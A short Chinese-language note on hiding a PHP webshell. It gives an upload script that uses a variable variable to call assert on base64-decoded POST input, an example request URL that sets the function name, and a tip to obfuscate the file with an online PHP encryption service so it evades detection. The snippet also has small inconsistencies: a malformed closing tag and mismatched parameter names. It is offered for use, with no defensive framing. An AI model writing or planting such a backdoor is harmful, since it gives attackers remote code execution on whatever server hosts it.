变量覆盖、
1.变量覆盖
要上传的脚本:
<?php
$a = $_GET['x'];
$$a = $_GET['y'];
$b(base64_decode($_POST['z']));
>
phpinfo();转为base64为:cGhwaW5mbygpOw==
url为:www.xxx.com?x=b&y=assert
传入的data:
x= cGhwaW5mbygpOw==
2.加密混淆
将脚本文件加密
加密连接:http://phpjiami.com/phpjiami.html